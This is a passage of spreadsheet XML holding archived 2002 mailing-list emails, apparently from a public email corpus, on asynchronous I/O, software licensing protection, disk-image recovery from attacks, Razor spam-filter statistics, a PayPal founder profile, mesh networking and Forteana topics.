aio_* routines can notify the process of their completion with &gt; a "signal", a feature missing in Microsoft Windows; a "signal" causes &gt; the immediate execution of a "signal handler" in a process.  By &gt; contrast, the Microsoft Windows mechanisms to do similar things (such &gt; as completion ports) do not deliver a notification until the process &gt; polls them. &gt; &gt; I don't think signals are a better way to do things in this case &gt; (although I haven't written any RDBMSes myself), but you got the &gt; technical descriptions of the two operating systems exactly backwards. &gt; Most programs that use Linux real-time signals for asynchronous &gt; network I/O, in fact, block the signal in question and poll the signal &gt; queue in a very Windowsish way, using sigtimedwait() or sigwaitinfo(). &gt; &gt; -- &gt;        Kragen Sitaker      &gt; Edsger Wybe Dijkstra died in August of 2002.  This is a terrible loss after &gt; which the world will never be the same. &gt; [URL]http://www.xent.com[/URL] &gt; - Adam L. "Duncan" Beberg   [URL]http://www.mithral.com[/URL]   beberg@mithral.com</t>
  </si>
  <si>
    <t>http://www.citi.umich.edu http://www.xent.com http://www.mithral.com</t>
  </si>
  <si>
    <t>To: &lt;fork@spamassassin.taint.org&gt;\nFrom: "Adam L. Beberg" &lt;beberg@mithral.com&gt;\nDate: Tue, 3 Sep 2002 19:23:46 -0700 (PDT)</t>
  </si>
  <si>
    <t>Tue, 3 Sep 2002 19:23:46 -0700 (PDT)</t>
  </si>
  <si>
    <t>Ah, THIS is the car i've seen on discovery channel, but url via a lurker.\n\n[URL]http://arivettracing.com[/URL]\n\n- Adam L. "Duncan" Beberg\n  [URL]http://www.mithral.com[/URL]\n  beberg@mithral.com</t>
  </si>
  <si>
    <t>http://arivettracing.com http://www.mithral.com</t>
  </si>
  <si>
    <t>To: secprog@securityfocus.com\nFrom: Yannick Gingras &lt;ygingras@ygingras.net&gt;\nDate: Tue, 3 Sep 2002 16:26:15 -0400</t>
  </si>
  <si>
    <t>Tue, 3 Sep 2002 16:26:15 -0400</t>
  </si>
  <si>
    <t>-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n&gt; What do you mean by "CD-Key or the like" (I presume that "of" was a\n&gt; typo)? And what do you mean by "unbreakable"?\n\n"of" was a typo\n\nUnbreakable would mean here that no one, even previously authorised entity, \ncould use the system without paying the periodic subscription fee.\n\n&gt; You need to be far more explicit about the problem which you wish to\n&gt; solve, and about the constraints involved.\n\nIt could be an online system that work 95% offline but poll frequently an \noffsite server.  No mass production CDs, maybe mass personalised d/l like Sun \nJDK.\n\nNothing is fixed yet, we are looking at the way a software can be protected \nfrom unauthorized utilisation.  \n\nIs the use of "trusted hardware" really worth it ?  Does it really make it \nmore secure ?  Look at the DVDs.\n\n- -- \nYannick Gingras\nCoder for OBB : Obdurately Buteonine Bellwether\n[URL]http://OpenBeatBox.org[/URL]\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.0.6 (GNU/Linux)\nComment: For info see [URL]http://www.gnupg.org[/URL]\n\niD8DBQE9dRrnuv7G0DNFO+QRAk8nAKClAhTmyrUgP3ko+DEjcvj0mqfjzACgwQvo\nWZ6/CMUA23HCMZVycd7XD1Q=\n=V2G8\n-----END PGP SIGNATURE-----</t>
  </si>
  <si>
    <t>http://OpenBeatBox.org http://www.gnupg.org</t>
  </si>
  <si>
    <t>To: secprog@securityfocus.com\nFrom: Yannick Gingras &lt;ygingras@ygingras.net&gt;\nDate: Tue, 3 Sep 2002 15:33:52 -0400</t>
  </si>
  <si>
    <t>Tue, 3 Sep 2002 15:33:52 -0400</t>
  </si>
  <si>
    <t>-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nLe 3 Septembre 2002 12:43, vous avez crit :\n&gt; Yannick,\n&gt; You'll want to peruse Fravia's web site on reverse engineering (and other\n&gt; things) [URL]http://www.woodmann.com[/URL] That specific page\n&gt; covers just your concerns.\n&gt;\n&gt; Josh\n\nThanks for the input.  Some of the tips are quite portable but are there any \nspecial attentions to take when implementing such shemes on a UNIX system ?\n\nThanks.\n\n- -- \nYannick Gingras\nCoder for OBB : Ostentatiously Breathless Brother-in-law\n[URL]http://OpenBeatBox.org[/URL]\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.0.6 (GNU/Linux)\nComment: For info see [URL]http://www.gnupg.org[/URL]\n\niD8DBQE9dQ6guv7G0DNFO+QRApsXAKCjD98foVvLjet3x9ExtihruvT7KACeNayD\nwDZlxJXjDmLFhNrN97cd73M=\n=4Clx\n-----END PGP SIGNATURE-----</t>
  </si>
  <si>
    <t>http://www.woodmann.com http://OpenBeatBox.org http://www.gnupg.org</t>
  </si>
  <si>
    <t>To: "Webappsec Securityfocus.Com" &lt;webappsec@securityfocus.com&gt;,\nFrom: bmord@icon-nicholson.com (Ben Mord)\nDate: Tue, 3 Sep 2002 15:04:27 -0400</t>
  </si>
  <si>
    <t>Tue, 3 Sep 2002 15:04:27 -0400</t>
  </si>
  <si>
    <t>bmord@icon-nicholson.com (Ben Mord)</t>
  </si>
  <si>
    <t>"Webappsec Securityfocus.Com" &lt;webappsec@securityfocus.com&gt;,</t>
  </si>
  <si>
    <t>use of base image / delta image for automated recovery from attacks</t>
  </si>
  <si>
    <t>Hi,\n\nI was inspired by a mode of operation supported by VMWare. You can have a\nbase disk image shared by multiple virtual machine (vm) instances. That base\nimage is never altered by a vm instance. Instead, each vm instance writes\nchanges to its own "redo" log. Future hard disk reads from that vm instance\nincorporate both the base image and the appropriate redo log to present the\ncurrent disk image for that specific virtual machine.\n\nThis is described here (thanks to Duane for providing this link on the\nhoneypots mailing list)\n[URL]http://www.vmware.com[/URL]\n\nCould this basic concept be used to easily make self-fixing client/server\napplications that efficiently and automatically recover from most attacks,\neven before those attacks have been discovered? Here is what I imagine.\n\nThe physical architectures of most production client/server systems are\nlayered. For example, your basic web application might have a web server\nrunning Apache, connected to an application server running some J2EE or .Net\nbusiness logic, connected to a database server for persistence. The only one\nof these whose disk image really should evolve over time is the database\nserver, and even here you often put the static RDBMS software on one\npartition and the changeable datafiles on another partition. It is only the\npartition with the volatile datafiles that must be allowed to change from\none boot to the next. Other paritions may need to be writable for, say, swap\nspace, but these changes could be eliminated on each reboot.\n\nWhen someone cracks this system, they will probably change an image that\nshouldn't be changed. E.g., they might leverage a buffer overflow in IIS or\nApache to install a trojan or a backdoor on the more exposed web server. But\nwhat if the web server ran off a base image, writing changes to a "delta" or\n"redo" partition? And then what if every night it automatically erased the\nredo partition and rebooted? The downtime involved for each machine would be\nminimal, because it is only deleting data - rather than restoring from\nbackup. In a system with redundant web servers for load balancing or high\navailability, this could be scheduled in a way such that the system is\nalways accessible. This base/redo partition concept could be implemented at\nthe same level as a feature of hardware RAID, allowing for greater\nperformance, reliability, and hack resistance. This concept could also be\napplied to the application servers, and even the database server partitions\n(except for those partitions which contain the table data files, of course.)\n\nDoes anyone do this already? Or is this a new concept? Or has this concept\nbeen discussed before and abandoned for some reasons that I don't yet know?\nI use the physical architecture of a basic web application as an example in\nthis post, but this concept could of course be applied to most server\nsystems. It would allow for the hardware-separation of volatile and\nnon-volatile disk images. It would be analogous to performing nightly\nghosting operations, only it would be more efficient and involve less (or\nno) downtime.\n\nThanks for any opinions,\nBen</t>
  </si>
  <si>
    <t>To: "Fox" &lt;lds0062@cdc.net&gt;, &lt;razor-users@example.sourceforge.net&gt;\nFrom: "Jonathan Nichols" &lt;jnichols@pbp.net&gt;\nDate: Tue, 3 Sep 2002 14:45:30 -0700</t>
  </si>
  <si>
    <t>Tue, 3 Sep 2002 14:45:30 -0700</t>
  </si>
  <si>
    <t>"Jonathan Nichols" &lt;jnichols@pbp.net&gt;</t>
  </si>
  <si>
    <t>"Fox" &lt;lds0062@cdc.net&gt;, &lt;razor-users@example.sourceforge.net&gt;</t>
  </si>
  <si>
    <t>Re: [Razor-users] Razor v2 effectiveness stats - HTML table - Take 2</t>
  </si>
  <si>
    <t>Oh, I was serious. I'm awful with perl/etc. I just think the HTML graph that was created was pretty neat and I wish I could do something like that. :-) &gt; I can't tell if you are serious or joking.  I have a custom perl based spam &gt; blocking framework that uses plug-ins to block spam.  I test each message &gt; with every plug-in and keep the stats in a mysql database, which are what &gt; you see below. &gt; &gt; Fox &gt; &gt; &gt; ----- Original Message ----- &gt; From: "Jonathan Nichols"  &gt; To:  &gt; Sent: Tuesday, September 03, 2002 2:07 PM &gt; Subject: Re: [Razor-users] Razor v2 effectiveness stats - HTML table - Take &gt; 2 &gt; &gt; &gt; &gt; How do you make up graphs like that, anyway? :-) &gt; &gt; &gt; &gt; ----- Original Message ----- &gt; &gt; From: "Daniel Higgins"  &gt; &gt; To: "Fox" ;  &gt; &gt; Sent: Tuesday, September 03, 2002 10:57 AM &gt; &gt; Subject: Re: [Razor-users] Razor v2 effectiveness stats - HTML table - &gt; Take &gt; &gt; 2 &gt; &gt; &gt; &gt; &gt; &gt; that's pretty impressive, have you seen any false positives yet? myself &gt; i'm &gt; &gt; still at the stage of creating the corpuses. i'll report back after i get &gt; &gt; some testing of my own :P &gt; &gt;   ----- Original Message ----- &gt; &gt;   From: Fox &gt; &gt;   To: razor-users@example.sourceforge.net &gt; &gt;   Sent: Tuesday, September 03, 2002 12:54 PM &gt; &gt;   Subject: Re: [Razor-users] Razor v2 effectiveness stats - HTML table - &gt; &gt; Take 2 &gt; &gt; &gt; &gt; &gt; &gt;   Sorry about the html, for those of you still using elm or other non-GUI &gt; &gt;   clients.  I don't have time to post it as text. &gt; &gt; &gt; &gt;   The "Spam Count" is the total of all spam detected by the various &gt; filters. &gt; &gt; &gt; &gt;   Jammed is a custom phrase ranking system. &gt; &gt;   Razored is Razor v2. &gt; &gt;   Bayesian filter is based off of Paul Graham's work (statistical &gt; &gt;   probability), using a corpus of 4000 non-spam and 2000 spam messages. &gt; &gt; &gt; &gt;         Spam Statistics &gt; &gt;         Date Spam Count Jammed Razored Blacklisted Trollbox Bayesian &gt; &gt;         2002-08-27 370 145    (39.19%) 181    (48.92%) 79    (21.35%) 120 &gt; &gt; (32.43%) 275    (74.32%) &gt; &gt;         2002-08-28 397 106    (26.70%) 126    (31.74%) 163    (41.06%) 136 &gt; &gt; (34.26%) 320    (80.60%) &gt; &gt;         2002-08-29 346 154    (44.51%) 146    (42.20%) 78    (22.54%) 101 &gt; &gt; (29.19%) 261    (75.43%) &gt; &gt;         2002-08-30 366 163    (44.54%) 166    (45.36%) 65    (17.76%) 138 &gt; &gt; (37.70%) 272    (74.32%) &gt; &gt;         2002-08-31 282 211    (74.82%) 133    (47.16%) 27    ( 9.57%) 132 &gt; &gt; (46.81%) 256    (90.78%) &gt; &gt;         2002-09-01 220 127    (57.73%) 125    (56.82%) 22    (10.00%) 91 &gt; &gt; (41.36%) 157    (71.36%) &gt; &gt;         2002-09-02 166 86    (51.81%) 77    (46.39%) 22    (13.25%) 64 &gt; &gt; (38.55%) 123    (74.10%) &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ------------------------------------------------------- &gt; &gt; This sf.net email is sponsored by: OSDN - Tired of that same old &gt; &gt; cell phone?  Get a new here for FREE! &gt; &gt; [URL]https://www.inphonic.com[/URL] &gt; &gt; _______________________________________________ &gt; &gt; Razor-users mailing list &gt; &gt; Razor-users@lists.sourceforge.net &gt; &gt; [URL]https://lists.sourceforge.net[/URL] &gt; &gt; &gt; &gt; ------------------------------------------------------- &gt; This sf.net email is sponsored by: OSDN - Tired of that same old &gt; cell phone?  Get a new here for FREE! &gt; [URL]https://www.inphonic.com[/URL] &gt; _______________________________________________ &gt; Razor-users mailing list &gt; Razor-users@lists.sourceforge.net &gt; [URL]https://lists.sourceforge.net[/URL] &gt; ------------------------------------------------------- This sf.net email is sponsored by: OSDN - Tired of that same old cell phone?  Get a new here for FREE! [URL]https://www.inphonic.com[/URL] _______________________________________________ Razor-users mailing list Razor-users@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>https://www.inphonic.com https://lists.sourceforge.net https://www.inphonic.com https://lists.sourceforge.net https://www.inphonic.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Rohit Khare &lt;khare@alumni.caltech.edu&gt;\nDate: Tue, 3 Sep 2002 14:35:48 -0700</t>
  </si>
  <si>
    <t>Tue, 3 Sep 2002 14:35:48 -0700</t>
  </si>
  <si>
    <t>InfoWorld profile of Max Levchin</t>
  </si>
  <si>
    <t>Congrats, in the end...\n&gt; "If they didn't have Max, they might have succumbed, because PayPal was \n&gt; susceptible to fraud and money laundering, and Max tightened them up,"\n\n[URL]http://www.infoworld.com[/URL]\n\nSecure and at ease\nByJack Mccarthy\nAugust 30, 2002 1:01 pm PT\n\nMAX LEVCHIN'S FASCINATION with encryption started when he was a teenager \nin Kiev, Ukraine, and continued as he immigrated to the United States \nwhere he attended the University of Illinois at Urbana-Champaign. In \nlate 1998, not two years out of college, he drew on his passion to \nco-found PayPal, the online payment system that has since attracted tens \nof millions of users and gained the reputation as the premier Internet \ntransaction processor. Now online auction house eBay has acquired his \ncompany for a king's ransom.\n\nNot bad for a 27-year-old kid from Ukraine.\n\nA programmer since he was 10 years old, Levchin and his family moved to \nChicago in 1991, and since then he has pursued security as if on a \nmission. He created a startup right out of college to build secure \npasswords for Palm Pilots. He met Peter Thiel, and the two founded \nPayPal to target online payment security. Thiel is now CEO of the \ncompany.\n\n"This company was founded on the notion of security value," Levchin \nsays. "Peter Thiel and I shared that vision from the very beginning."\n\nThiel concentrates on company business matters, whereas Levchin remains \nfocused on security, which he says is the key to the company's good \nfortune.\n\n"I explain [PayPal] as a security company posing as a transaction \nprocessor," Levchin says. "We spend a lot of time designing security so \nit doesn't step on the toes of convenience and not the other way around. \nThe trade-off is fundamental."\n\nMountain View, Calif.-based PayPal allows businesses and consumers with \ne-mail addresses to send and receive payments via the Internet, \naccepting credit card or bank account payments for purchases. The \nservice extends to 38 countries, with more than 17 million users and \nmore than 3 million business accounts.\n\nMost of PayPal's users are participants in online auctions, which led \nPayPal to be closely linked with eBay, the leading Web auction site. \nAlthough they were once rivals, the relationship between the two \ncompanies resulted July 8 in eBay's tentative $1.5 billion acquisition \nof PayPal. The agreement is subject to regulatory review.\n\nLevchin says he will stay at PayPal as it merges with eBay. "There are \nareas of synergy and collaboration we can explore."\n\nAlthough security is a dominant feature for PayPal, the company's \nability to carry out open communications among the millions of \nparticipants fits the growing Web services model, Levchin says.\n\n"This is a service that links people and allows them to send messages to \none another," he says. Levchin is a panelist at InfoWorld's \nNext-Generation Web Services II conference Sept. 20\n\nPayPal, as an online payment system, is a natural target for fraud. And \nLevchin has almost singlehandedly saved the company from thieves bent on \nexploiting the system, says Avivah Litan, a vice president and analyst \ncovering financial services at Stamford, Conn.-based Gartner.\n\n"If they didn't have Max, they might have succumbed, because PayPal was \nsusceptible to fraud and money laundering, and Max tightened them up," \nLitan says.\n\nTo combat criminals, Levchin established "Igor," an antifraud program \nthat monitors transactions and warns of suspicious accounts. Levchin \nsays building security and antifraud systems is a job he relishes. "The \nwork I do is important to PayPal and to consumers in general because the \nwork makes Internet shopping safe. It's the view that ecommerce has \narrived."</t>
  </si>
  <si>
    <t>http://www.infoworld.com</t>
  </si>
  <si>
    <t>To: razor-users@example.sourceforge.net\nFrom: Jordan Ritter &lt;jpr5@darkridge.com&gt;\nDate: Tue, 3 Sep 2002 14:18:55 -0700</t>
  </si>
  <si>
    <t>Tue, 3 Sep 2002 14:18:55 -0700</t>
  </si>
  <si>
    <t>Re: [Razor-users] razor plugins for mozilla?</t>
  </si>
  <si>
    <t>--aT9PWwzfKXlsBJM1\nContent-Type: text/plain; charset=us-ascii\nContent-Disposition: inline\n\nRevoking self-submitted content (unblocking something you accidentally\nblocked) results in permanent deletion of said content from the\nnetwork.\n\nFortunately, Razor2/SpamNet isa network of content people DON'T want\n[in their inbox, let alone IP rights].  Block away!\n\n--jordan\n\n\nOn Tue, Sep 03, 2002 at 12:24:33PM -0700, Craig R.Hughes wrote:\n\n# "Free" is a relative concept if you actually read the EULA.  No\n# commercial use, and anything you submit to razor becomes entirely\n# their intellectual property.  Better not accidentally hit "This is\n# spam" on anything you want to retain IP rights to.\n\n--aT9PWwzfKXlsBJM1\nContent-Type: application/pgp-signature\nContent-Disposition: inline\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.0.7 (GNU/Linux)\n\niD8DBQE9dSc/pwQdAVEbU7oRAlZcAJ0dsOi7U1Mf/2LjCE87mRSBhe1gpQCeJ7yf\nP310bOJSkBt79KRJMo+oTgQ=\n=+IYG\n-----END PGP SIGNATURE-----\n\n--aT9PWwzfKXlsBJM1--\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by: OSDN - Tired of that same old\ncell phone?  Get a new here for FREE!\n[URL]https://www.inphonic.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: Russell Turpin &lt;deafbox@hotmail.com&gt;\nFrom: "Adam L. Beberg" &lt;beberg@mithral.com&gt;\nDate: Tue, 3 Sep 2002 13:31:03 -0700 (PDT)</t>
  </si>
  <si>
    <t>Tue, 3 Sep 2002 13:31:03 -0700 (PDT)</t>
  </si>
  <si>
    <t>Russell Turpin &lt;deafbox@hotmail.com&gt;</t>
  </si>
  <si>
    <t>Re: Signers weren't angry young men  (was: Java is for kiddies)</t>
  </si>
  <si>
    <t>On Tue, 3 Sep 2002, Russell Turpin wrote:\n\n&gt; For the most part, these were angry, middle-aged men. A column in this\n&gt; table shows their age at the time:\n\nMainly they were a bunch of rich people (the white/old/male is irrelivant\nbut how it happened to be at the time) that didnt want to pay their taxes to\nda man er... king. So they had a revolution and formed a no-tax zone,\nleading to a very fast growing economy and dreams for all - amazing what\nan economy without 40% of everything disappearing to taxes. It was a great\nmany years before their were federal taxes in the US.\n\nNow we give rich men who dont want to pay any taxes corporations to run,\nwith enough writeoffs and loopholes that they dont have to pay any :)\n\n- Adam L. "Duncan" Beberg\n  [URL]http://www.mithral.com[/URL]\n  beberg@mithral.com</t>
  </si>
  <si>
    <t>To: &lt;fork@spamassassin.taint.org&gt;\nFrom: "John Hall" &lt;johnhall@evergo.net&gt;\nDate: Tue, 3 Sep 2002 13:27:40 -0700</t>
  </si>
  <si>
    <t>Tue, 3 Sep 2002 13:27:40 -0700</t>
  </si>
  <si>
    <t>RE: Gasp!</t>
  </si>
  <si>
    <t>I used Async IO on System V in the '87, '88 time frame.  I did it that\nway cause I thought it was cool to see if I could keep the tape\nspinning.\n\nI can believe Linux is catching up to this, but some ability to do async\nIO already existed in the UNIX world.\n\nJohn Hall\n13464 95th Ave NE\nKirkland WA 98034\n\n\n&gt; -----Original Message-----\n&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of\nAdam\n&gt; L. Beberg\n&gt; Sent: Saturday, August 31, 2002 7:35 PM\n&gt; To: fork@spamassassin.taint.org\n&gt; Subject: Gasp!\n&gt; \n&gt; "Red Hat Linux Advanced Server provides many high end features such\nas:\n&gt; Support for Asynchronous I/O. Now read I/O no longer needs to stall\nyour\n&gt; application while waiting for completion."\n&gt; \n&gt; Could it be? After 20 years without this feature UNIX finally catches\nup\n&gt; to\n&gt; Windows and has I/O that doesnt totally suck for nontrivial apps? No\nway!\n&gt; \n&gt; OK, so they do it with signals or a flag, which is completely ghetto,\nbut\n&gt; at\n&gt; least they are trying. Keep trying guys, you got the idea, but not the\n&gt; clue.\n&gt; \n&gt; - Adam L. "Duncan" Beberg\n&gt;   [URL]http://www.mithral.com[/URL]\n&gt;   beberg@mithral.com</t>
  </si>
  <si>
    <t>To: "Arnaud Abelard" &lt;arnaud.abelard@sciences.univ-nantes.fr&gt;,\nFrom: "Fox" &lt;lds0062@cdc.net&gt;\nDate: Tue, 3 Sep 2002 12:42:54 -0400</t>
  </si>
  <si>
    <t>Tue, 3 Sep 2002 12:42:54 -0400</t>
  </si>
  <si>
    <t>"Fox" &lt;lds0062@cdc.net&gt;</t>
  </si>
  <si>
    <t>"Arnaud Abelard" &lt;arnaud.abelard@sciences.univ-nantes.fr&gt;,</t>
  </si>
  <si>
    <t>No, please post a link! Fox ----- Original Message ----- From: "Arnaud Abelard"  To:  Sent: Tuesday, September 03, 2002 2:39 AM Subject: [Razor-users] razor plugins for mozilla? &gt; Hello, &gt; &gt; did any of you hear about a a razor plugin for mozilla? &gt; a plugin that would add a "report as spam" button somewhere for the user &gt; to report a mail as spam on a server? &gt; &gt; Arnaud &gt; -- &gt; Arnaud Ablard &gt; Administrateur rseaux et systmes &gt; Irin / Facult de Sciences &gt; Universit de Nantes &gt; &gt; &gt; &gt; ------------------------------------------------------- &gt; This sf.net email is sponsored by: OSDN - Tired of that same old &gt; cell phone?  Get a new here for FREE! &gt; [URL]https://www.inphonic.com[/URL] &gt; _______________________________________________ &gt; Razor-users mailing list &gt; Razor-users@lists.sourceforge.net &gt; [URL]https://lists.sourceforge.net[/URL] ------------------------------------------------------- This sf.net email is sponsored by: OSDN - Tired of that same old cell phone?  Get a new here for FREE! [URL]https://www.inphonic.com[/URL] _______________________________________________ Razor-users mailing list Razor-users@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>https://www.inphonic.com https://lists.sourceforge.net https://www.inphonic.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: &lt;transhumantech@yahoogroups.com&gt;\nFrom: Eugen Leitl &lt;eugen@leitl.org&gt;\nDate: Tue, 3 Sep 2002 08:05:27 +0200 (CEST)</t>
  </si>
  <si>
    <t>Tue, 3 Sep 2002 08:05:27 +0200 (CEST)</t>
  </si>
  <si>
    <t>&lt;transhumantech@yahoogroups.com&gt;</t>
  </si>
  <si>
    <t>Making a mesh on the move</t>
  </si>
  <si>
    <t>[URL]http://www.guardian.co.uk[/URL]\n\nMaking a mesh on the move\n\nA new way to give us fast mobile net access spells further trouble for 3G, \nreports Peter Rojas\n\nPeter Rojas\nThursday August 29, 2002\nThe Guardian\n\nImagine being able to surf the net at speeds faster than DSL from \nanywhere, at any time - you could watch a live video webcast while waiting \nfor the bus, email photos to your friends while sitting in the park, or \ndownload the MP3 of the song that's playing in the pub before it finishes.\n\nThis is the vision of a high-speed wireless internet paradise that the \nthird-generation (3G) mobile phone companies have been promoting for \nyears. 3G services are just beginning to be rolled out, but a new \ntechnology called mesh networking promises to deliver on this vision \nsooner and more effectively than the mobile phone companies could ever \ndream.\n\nTwo companies, US startup MeshNetworks and Moteran Networks of Germany, \nare each developing their own competing version of mesh networking. \nInstead of the current hub-and-spoke model of wireless communications, \nwith every device connecting to an overburdened central antenna, any time \n"mesh-enabled" devices - mobile phones, PDAs, laptops - are in close \nproximity to each other, they automatically create a wireless mesh \nnetwork. Every device in the area acts as a repeater or router, relaying \ntraffic for everyone else. Traffic hops from person to person until it \nreaches the nearest internet access point, reducing the need for central \nantennas, and improving wireless coverage.\n\nAs the number of mobile phones soars, and wireless PDAs, laptops, and \nother devices begin to crowd the spectrum, this approach to wireless \nnetworking may be inevitable.\n\nMesh networks also have several other advantages over 3G wireless \nnetworks. While 3G operators roll out mobile services that offer users \nconnection speeds of up to 144 kbps (roughly three times faster than a \ndial-up modem), Moteran and MeshNetworks are able to offer connection \nspeeds of up to 6Mbps, over a hundred times faster than dial-up. The \ntechnologies they use include Wi-Fi - the emerging standard for high-speed \nwireless networking also known as 802.11b. A similarly short-range \nprotocol called UltraWideBand, which is poised to succeed Wi-Fi, is even \nfaster and could, by 2005, approach 400 Mbps.\n\nThe range of a typical Wi-Fi network is generally too limited to be of \nmuch use when travelling around a city. Mesh networks get around the \nproblem of coverage by having every device in the network relay traffic. \nEven though the range of any individual device is relatively small, \nbecause (in theory) there will be so many users in the surrounding area, \nconnections will be faster and better than that of a standard 3G wireless \nconnection.\n\nBecause mesh networks use Wi-Fi, the equipment and infrastructure needed \nto create them is cheap and readily available. Instead of building \ncellular phone towers that often cost hundreds of thousands of pounds, all \nthat is needed to get a network going are wireless access points (around \n100 now) placed strategically around town to relay traffic, and the \nproper software. Existing laptops and PDAs can be mesh-enabled by \nsoftware.\n\nIt also means that anyone could set up their own mobile phone network. \nUnlike with 3G cellular, the part of the spectrum that Wi-Fi operates on \nis unregulated in the US, Britain. The mobile phone companies are none too \npleased about this, especially since many of them spent billions of pounds \nacquiring 3G licences.\n\nAll that's needed are cheap relays and mobile phones equipped to connect \nto the network. With every additional customer that signs up coverage gets \nbetter, instead of getting worse, as is the case with mobile phone \nnetworks.\n\nBut things get very interesting when you realise that when you have \nhigh-speed internet connections everywhere, and everyone's laptops, PDAs, \nand mobile phones are connected together at blazingly fast speeds, sharing \nmusic, movies, or whatever else becomes ridiculously easy. When \nUltraWideBand hits, all of this will just accelerate.\n\nAt 400Mbps, copying a pirated copy of the Lord of the Rings from the \nperson sitting across from you at the cafe would take about 15 seconds. \nSooner or later, playgrounds will be filled with kids swapping files of \ntheir favourite songs, movies, and video games.\n\nBut the first mesh networks are not likely to be available to consumers. \nMeshNetworks has no plans to offer its own high-speed wireless service. \nInstead the company plans to sell its technology to others, such as cities \nthat want to provide wireless internet to police, fire, and public works \nemployees, or businesses that want to establish wireless networks on the \ncheap. Moteran has similar aspirations for small businesses and for \nenterprise networks.\n\nThe first place average users may use the technology is when it is \nincorporated into vehicles, enabling motorists to access the internet at \nhigh speeds, which both companies see happening soon.\n\nWhen will you be able to wander around town with a 6Mbps connection in \nyour pocket? It's too soon to say, but just as broadband internet service \nwas initially available only to businesses and universities, eventually \nsomeone will see the profit in bringing mesh networking to the masses.</t>
  </si>
  <si>
    <t>http://www.guardian.co.uk</t>
  </si>
  <si>
    <t>To: &lt;zzzzteana@yahoogroups.com&gt;\nFrom: "John Kahila" &lt;jkahila@world.std.com&gt;\nDate: Tue, 27 Aug 2002 23:57:42 -0400</t>
  </si>
  <si>
    <t>Tue, 27 Aug 2002 23:57:42 -0400</t>
  </si>
  <si>
    <t>"John Kahila" &lt;jkahila@world.std.com&gt;</t>
  </si>
  <si>
    <t>RE: [zzzzteana] Moon over ocean</t>
  </si>
  <si>
    <t>&gt;David asked:\n&gt;&gt; My wife noticed something odd.  The nearly-full moon was about 30\n&gt;&gt; degrees above the horizon.  There was a notable glow on the horizon,\n&gt;&gt; except under the moon.  The moon seemed to be in a column of darkness\n&gt;&gt; that was about three times the apparent width of the moon.  We could see\n&gt;&gt; the column over its entire length as a strip of sky darker than the sky\n&gt;&gt; around it.\n&gt;&gt;\n&gt;&gt; Any of you ever see this?  Do you have any idea what could have caused\n&gt;&gt; it?  I suspect it's due to some pecularity of the visual system, but\n&gt;&gt; have no clear idea.\n\nBill Jacobs:\n&gt; I'm surprised to not find this phenomenon in Corlis. I could have sworn I\n&gt; saw it there. He does have the somewhat similar dark sky between a rainbow\n&gt; and a secondary bow. I personally have seen a rainbow enclosing a\n&gt; semi-circle of darker sky.\n&gt;\n&gt; I know I've read about pillars under the Sun and Moon elsewhere,\n&gt; but I can't recall if they were reportedly dark or bright. I do know\n&gt; these sorts of things are supposed to be quirks of optics not of the\n&gt; visual system. I'm sorry I haven't got any answers, but a search\n&gt; through some books on atmospheric optics ought to turn a few hints up.\n\nSome links:\n\ncomprehensive\n[URL]http://www.meteoros.de[/URL]\n\nAtmospheric Light Phenomena\n[URL]http://www.auf.asn.au[/URL]\n\ninteresting observational stuff from the prior millenium including pix\n(click 1997 / colour plates)\n[URL]http://www.ursa.fi[/URL]\n\nmore pix, many of which flip to negative to highlight details (hover cursor)\n[URL]http://idefix.taide.turkuamk.fi[/URL] and\nsubsequent links\n\njohn k\n\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\n4 DVDs Free +s&amp;p Join Now\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>http://www.meteoros.de http://www.auf.asn.au http://www.ursa.fi http://idefix.taide.turkuamk.fi http://us.click.yahoo.com http://docs.yahoo.com</t>
  </si>
  <si>
    <t>To: zzzzteana@yahoogroups.com\nFrom: That Goddess Chick &lt;felinda@frogstone.net&gt;\nDate: Tue, 27 Aug 2002 23:38:48 -0500</t>
  </si>
  <si>
    <t>Tue, 27 Aug 2002 23:38:48 -0500</t>
  </si>
  <si>
    <t>That Goddess Chick &lt;felinda@frogstone.net&gt;</t>
  </si>
  <si>
    <t>Re: [zzzzteana] Bad Buffalo</t>
  </si>
  <si>
    <t>&gt;peter fwded:\n&gt;&gt;Finally, Constable Evans hurled a thong at the animal, hitting it on the\n&gt;&gt;head.\n&gt;\n&gt;I know this isn't *quite* as funny to Australians as it is to\n&gt;everyone else. Honestly.\n&gt;\n&gt;Rachel\n&gt;not that walloping it with a flip-flop isn't hilarious too...\n&gt;--\n\nwell unless you used the thong like a sling shot.....\n-- \n\n\nFel\n[URL]http://www.frogstone.net[/URL]\nWeird Page: [URL]http://my.athenet.net[/URL]\n\n[Non-text portions of this message have been removed]\n\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\n4 DVDs Free +s&amp;p Join Now\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>http://www.frogstone.net http://my.athenet.net http://us.click.yahoo.com http://docs.yahoo.com</t>
  </si>
  <si>
